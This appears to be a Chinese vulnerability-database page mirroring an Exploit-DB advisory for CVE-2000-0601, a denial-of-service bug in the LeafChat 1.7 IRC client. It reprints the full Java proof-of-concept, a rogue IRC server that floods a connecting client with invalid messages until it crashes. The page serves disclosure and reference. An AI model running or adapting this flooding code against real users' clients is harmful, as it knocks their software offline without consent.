LeafDigital LeafChat 1.7 DoS漏洞

LeafDigital LeafChat 1.7 DoS漏洞

漏洞ID 1105895 漏洞类型 其他
发布时间 2000-06-25 更新时间 2005-05-02
图片[1]-LeafDigital LeafChat 1.7 DoS漏洞-安全小百科CVE编号 CVE-2000-0601
图片[2]-LeafDigital LeafChat 1.7 DoS漏洞-安全小百科CNNVD-ID CNNVD-200006-099
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20039
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-099
|漏洞详情
LeafChat1.7版本IRC客户端存在漏洞。远程IRC服务器通过迅速发送大量错误信息导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1396/info

If invalid data is sent repeatedly from a IRC server to a LeafDigital LeafChat IRC client, the program will stop responding. Restarting the application will be required in order to regain normal functionality. 

/* The MDMA Crew's Proof-of-concept code for the DoS affecting LeafChat
 *
 * When the LeafChat IRC client recieves invalid data from the server, it
 * displays a dialog box with an error message. Should the server rapidly
 * send invalid messages, the system soon becomes dangerously low in
 * resources and commits harikiri. :-)
 *
 * Vendor Info: www.leafdigital.com/Software/leafChat
 * Crew Info: www.mdma.za.net || [email protected]
 */

import java.io.*;
import java.net.*;

class leafMeAlone {

// Line below will have to be changed for Microsoft's Java VM - oops ;P
static void main(String[] args) throws IOException, UnknownHostException {

    ServerSocket shervshoq = null;
    PrintWriter white = null;
    Socket shmoeshoq = null;

    shervshoq = new ServerSocket(6667);
    System.out.print("Now listening on Port 6667... ");

    try {
      shmoeshoq = shervshoq.accept();
      white = new PrintWriter(shmoeshoq.getOutputStream(), true);
    } catch (IOException e) {
      System.out.println("Errors accepting connection, y0");
      System.exit(1); }

    System.out.print("Connection recievednCrashing client... ");
    for (;;) {
      white.println(".");
      if (white.checkError()) {
      System.out.println("Crashed");
      break; } } } }
|参考资料

来源:BUGTRAQ
名称:20000625LeafChatDenialofService
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:www.leafdigital.com
链接:http://www.leafdigital.com/Software/leafChat/history.html
来源:BID
名称:1396
链接:http://www.securityfocus.com/bid/1396

相关推荐: CylantSecure Kernel Module Syscall Rerouting Vulnerability

CylantSecure Kernel Module Syscall Rerouting Vulnerability 漏洞ID 1103112 漏洞类型 Design Error 发布时间 2001-06-29 更新时间 2001-06-29 CVE编号 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享